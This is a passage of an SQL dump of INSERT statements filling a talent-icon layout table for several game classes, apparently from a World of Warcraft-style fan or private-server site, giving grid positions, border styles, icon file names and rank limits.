INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 1, 5, 2, 'talent_icon', 'icon_border_grey_down', 'spell_ice_lament.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 1, 5, 3, 'talent_icon', 'icon_border_grey', 'ability_rogue_kidneyshot.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 1, 6, 2, 'talent_icon', 'icon_border_grey_inc', 'spell_shadow_chilltouch.png', 5, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 1, 7, 2, 'talent_icon', 'icon_border_grey', 'spell_nature_earthbindtotem.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 2, 1, 1, 'talent_icon', 'icon_border_green', 'ability_gouge.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 2, 1, 2, 'talent_icon', 'icon_border_green', 'spell_shadow_ritualofsacrifice.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 2, 1, 3, 'talent_icon', 'icon_border_green', 'spell_nature_invisibilty.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 2, 2, 1, 'talent_icon', 'icon_border_grey', 'ability_backstab.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 2, 2, 2, 'talent_icon', 'icon_border_grey_down', 'ability_parry.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 2, 2, 3, 'talent_icon', 'icon_border_grey_down', 'ability_marksmanship.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 2, 3, 1, 'talent_icon', 'icon_border_grey', 'spell_shadow_shadowward.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 2, 3, 2, 'talent_icon', 'icon_border_grey_inc', 'ability_warrior_challange.png', 1, 2, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 2, 3, 3, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 2, 3, 4, 'talent_icon', 'icon_border_grey', 'ability_rogue_sprint.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 2, 4, 1, 'talent_icon', 'icon_border_grey', 'ability_kick.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 2, 4, 2, 'talent_icon', 'icon_border_grey', 'inv_weapon_shortblade_05.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 2, 4, 3, 'talent_icon', 'icon_border_grey_inc', 'ability_dualwield.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 2, 5, 1, 'talent_icon', 'icon_border_grey', 'inv_mace_01.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 2, 5, 2, 'talent_icon', 'icon_border_grey_down', 'ability_warrior_punishingblow.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 2, 5, 3, 'talent_icon', 'icon_border_grey', 'inv_sword_27.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 2, 5, 4, 'talent_icon', 'icon_border_grey', 'inv_gauntlets_04.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 2, 6, 2, 'talent_icon', 'icon_border_grey_inc', 'spell_holy_blessingofstrength.png', 2, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 2, 6, 3, 'talent_icon', 'icon_border_grey', 'ability_racial_avatar.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 2, 7, 2, 'talent_icon', 'icon_border_grey', 'spell_shadow_shadowworddominate.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 3, 1, 2, 'talent_icon', 'icon_border_green', 'spell_shadow_charm.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 3, 1, 3, 'talent_icon', 'icon_border_green', 'ability_warrior_warcry.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 3, 2, 1, 'talent_icon', 'icon_border_grey', 'ability_rogue_feint.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 3, 2, 2, 'talent_icon', 'icon_border_grey', 'spell_magic_lesserinvisibilty.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 3, 2, 3, 'talent_icon', 'icon_border_grey', 'ability_stealth.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 3, 3, 1, 'talent_icon', 'icon_border_grey', 'spell_shadow_fumble.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 3, 3, 2, 'talent_icon', 'icon_border_grey', 'spell_shadow_curse.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 3, 3, 3, 'talent_icon', 'icon_border_grey', 'ability_rogue_ambush.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 3, 4, 1, 'talent_icon', 'icon_border_grey', 'spell_nature_mirrorimage.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 3, 4, 2, 'talent_icon', 'icon_border_grey', 'ability_sap.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 3, 4, 3, 'talent_icon', 'icon_border_grey_right', 'inv_sword_17.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 3, 4, 4, 'talent_arrow', 'icon_arrow_grey_down_right', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 3, 5, 1, 'talent_icon', 'icon_border_grey', 'ability_ambush.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 3, 5, 2, 'talent_icon', 'icon_border_grey_down', 'spell_shadow_antishadow.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 3, 5, 3, 'talent_icon', 'icon_border_grey', 'spell_shadow_summonsuccubus.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 3, 5, 4, 'talent_icon', 'icon_border_grey_inc', 'spell_shadow_lifedrain.png', 1, 4, 3); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 3, 6, 2, 'talent_arrow', 'icon_arrow_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 3, 6, 3, 'talent_icon', 'icon_border_grey', 'inv_weapon_crossbow_11.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (4, 3, 7, 2, 'talent_icon', 'icon_border_grey_inc', 'spell_shadow_possession.png', 1, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 1, 1, 2, 'talent_icon', 'icon_border_green', 'spell_magic_magearmor.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 1, 1, 3, 'talent_icon', 'icon_border_green', 'inv_wand_01.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 1, 2, 1, 'talent_icon', 'icon_border_grey', 'spell_nature_manaregentotem.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 1, 2, 2, 'talent_icon', 'icon_border_grey', 'spell_holy_wordfortitude.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 1, 2, 3, 'talent_icon', 'icon_border_grey', 'spell_holy_powerwordshield.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 1, 2, 4, 'talent_icon', 'icon_border_grey', 'spell_nature_tranquility.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 1, 3, 2, 'talent_icon', 'icon_border_grey', 'spell_frost_windwalkon.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 1, 3, 3, 'talent_icon', 'icon_border_grey_down', 'spell_nature_sleep.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 1, 4, 1, 'talent_icon', 'icon_border_grey', 'spell_holy_innerfire.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 1, 4, 2, 'talent_icon', 'icon_border_grey', 'ability_hibernation.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 1, 4, 3, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 1, 4, 4, 'talent_icon', 'icon_border_grey', 'spell_shadow_manaburn.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 1, 5, 2, 'talent_icon', 'icon_border_grey_down', 'spell_nature_enchantarmor.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 1, 5, 3, 'talent_icon', 'icon_border_grey_inc', 'spell_holy_divinespirit.png', 1, 3, 3); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 1, 6, 2, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 1, 6, 3, 'talent_icon', 'icon_border_grey', 'spell_nature_slowingtotem.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 1, 7, 2, 'talent_icon', 'icon_border_grey_inc', 'spell_holy_powerinfusion.png', 1, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 2, 1, 1, 'talent_icon', 'icon_border_green', 'spell_holy_healingfocus.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 2, 1, 2, 'talent_icon', 'icon_border_green', 'spell_holy_renew.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 2, 1, 3, 'talent_icon', 'icon_border_green', 'spell_holy_sealofsalvation.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 2, 2, 2, 'talent_icon', 'icon_border_grey', 'spell_holy_spellwarding.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 2, 2, 3, 'talent_icon', 'icon_border_grey_down', 'spell_holy_sealofwrath.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 2, 3, 1, 'talent_icon', 'icon_border_grey', 'spell_holy_holynova.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 2, 3, 2, 'talent_icon', 'icon_border_grey', 'spell_holy_blessedrecovery.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 2, 3, 3, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 2, 3, 4, 'talent_icon', 'icon_border_grey', 'spell_holy_layonhands.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 2, 4, 1, 'talent_icon', 'icon_border_grey', 'spell_holy_purify.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 2, 4, 2, 'talent_icon', 'icon_border_grey', 'spell_holy_heal02.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 2, 4, 3, 'talent_icon', 'icon_border_grey_inc', 'spell_holy_searinglightpriest.png', 2, 2, 3); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 2, 5, 1, 'talent_icon', 'icon_border_grey', 'spell_holy_prayerofhealing02.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 2, 5, 2, 'talent_icon', 'icon_border_grey_down', 'inv_enchant_essenceeternallarge.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 2, 5, 3, 'talent_icon', 'icon_border_grey', 'spell_holy_spiritualguidence.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 2, 6, 2, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 2, 6, 3, 'talent_icon', 'icon_border_grey', 'spell_nature_moonglow.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 2, 7, 2, 'talent_icon', 'icon_border_grey_inc', 'spell_holy_summonlightwell.png', 1, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 3, 1, 2, 'talent_icon', 'icon_border_green', 'spell_shadow_requiem.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 3, 1, 3, 'talent_icon', 'icon_border_green', 'spell_shadow_gathershadows.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 3, 2, 1, 'talent_icon', 'icon_border_grey', 'spell_shadow_shadowward.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 3, 2, 2, 'talent_icon', 'icon_border_grey', 'spell_shadow_shadowwordpain.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 3, 2, 3, 'talent_icon', 'icon_border_grey', 'spell_shadow_burningspirit.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 3, 3, 1, 'talent_icon', 'icon_border_grey_down', 'spell_shadow_psychicscream.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 3, 3, 2, 'talent_icon', 'icon_border_grey', 'spell_shadow_unholyfrenzy.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 3, 3, 3, 'talent_icon', 'icon_border_grey', 'spell_shadow_siphonmana.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 3, 4, 1, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 3, 4, 2, 'talent_icon', 'icon_border_grey', 'spell_magic_lesserinvisibilty.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 3, 4, 3, 'talent_icon', 'icon_border_grey', 'spell_shadow_chilltouch.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 3, 4, 4, 'talent_icon', 'icon_border_grey', 'spell_shadow_blackplague.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 3, 5, 1, 'talent_icon', 'icon_border_grey_inc', 'spell_shadow_impphaseshift.png', 1, 3, 1); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 3, 5, 2, 'talent_icon', 'icon_border_grey_down_right', 'spell_shadow_unsummonbuilding.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 3, 5, 3, 'talent_icon', 'icon_border_grey_inc_left', 'spell_shadow_improvedvampiricembrace.png', 2, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 3, 6, 2, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 3, 6, 3, 'talent_icon', 'icon_border_grey', 'spell_shadow_twilight.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (5, 3, 7, 2, 'talent_icon', 'icon_border_grey_inc', 'spell_shadow_shadowform.png', 1, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 1, 1, 2, 'talent_icon', 'icon_border_green', 'spell_nature_wispsplode.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 1, 1, 3, 'talent_icon', 'icon_border_green', 'spell_fire_fireball.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 1, 2, 1, 'talent_icon', 'icon_border_grey', 'spell_nature_stoneclawtotem.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 1, 2, 2, 'talent_icon', 'icon_border_grey', 'spell_nature_spiritarmor.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 1, 2, 3, 'talent_icon', 'icon_border_grey', 'spell_fire_immolation.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 1, 3, 1, 'talent_icon', 'icon_border_grey', 'spell_shadow_manaburn.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 1, 3, 2, 'talent_icon', 'icon_border_grey', 'spell_frost_frostward.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 1, 3, 3, 'talent_icon', 'icon_border_grey_down', 'spell_nature_callstorm.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 1, 4, 1, 'talent_icon', 'icon_border_grey', 'spell_fire_sealoffire.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 1, 4, 2, 'talent_icon', 'icon_border_grey', 'spell_nature_eyeofthestorm.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 1, 4, 3, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 1, 4, 4, 'talent_icon', 'icon_border_grey', 'spell_fire_elementaldevastation.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 1, 5, 1, 'talent_icon', 'icon_border_grey', 'spell_nature_stormreach.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 1, 5, 2, 'talent_icon', 'icon_border_grey_down', 'spell_fire_volcano.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 1, 5, 3, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 1, 6, 2, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 1, 6, 3, 'talent_icon', 'icon_border_grey_inc', 'spell_lightning_lightningbolt01.png', 5, 3, 3); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 1, 7, 2, 'talent_icon', 'icon_border_grey_inc', 'spell_nature_wispheal.png', 1, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 2, 1, 2, 'talent_icon', 'icon_border_green', 'spell_shadow_grimward.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 2, 1, 3, 'talent_icon', 'icon_border_green', 'inv_shield_06.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 2, 2, 1, 'talent_icon', 'icon_border_grey', 